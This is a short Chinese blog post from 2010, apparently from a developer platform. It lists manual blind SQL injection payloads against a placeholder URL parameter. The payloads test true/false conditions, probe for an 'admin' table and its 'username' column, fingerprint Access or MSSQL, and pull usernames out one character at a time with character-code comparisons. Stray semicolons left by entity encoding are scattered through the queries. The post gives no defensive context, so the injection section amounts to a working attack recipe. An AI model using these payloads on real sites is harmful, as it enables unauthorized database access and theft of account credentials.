sql注入检测:手工检测可否注入的大致经过

于 2010-09-06 15:28:58 发布
阅读量139 收藏
点赞数
文章标签: SQL Access
http://url/xx?id=1111 ;and ;1=1 ;(正常页面) ;
http://url/xx?id=1111 ;and ;1=2 ;(出错页面) ;

; ;
□ ;检测表段 ;
; ;
http://url/xx?id=1111 ;and ;exists ;(select ;* ;from ;admin) ; ;

; ;
□ ;检测字段 ;
; ;
http://url/xx?id=1111 ;and ;exists ;(select ;username ;from ;admin) ; ;

; ;
□ ;检测ID ;
; ;
http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;ID=1) ;
;
□ ;检测长度 ;
; ;
http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;len(username)=5 ;and ;ID=1) ; ;

; ;
□ ;检测长度 ;
; ;
http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;len(username)=5 ;and ;ID=1) ; ;

; ;
□ ;检测是否为MSSQL数据库 ;
; ;
http://url/xx?id=1111 ;and ;exists ;(select ;* ;from ;sysobjects) ;
□ ;检测是否为英文 ;
; ;
(ACCESS数据库) ;
http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;asc(mid(username,1,1)) ;between ;30
;and ;130 ;and ;ID=1) ; ;

(MSSQL数据库) ;
http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;unicode(sub(username,1,1))
;between ;30 ;and ;130 ;and ;ID=1) ; ;


; ;
□ ;检测英文范围 ;
; ;
(ACCESS数据库) ;
http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;asc(mid(username,1,1)) ;between ;90
;and ;100 ;and ;ID=1) ; ;

(MSSQL数据库) ;
http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;unicode(sub(username,1,1))
;between ;90 ;and ;100 ;and ;ID=1) ; ;

; ;
□ ;检测那个 ;
; ;
(ACCESS数据库) ;
http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;asc(mid(username,1,1))=97 ;and
;ID=1) ; ;
(MSSQL数据库) ;
http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;unicode(sub(username,1,1))=97 ;and
;ID=1) ;
jiav_net
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值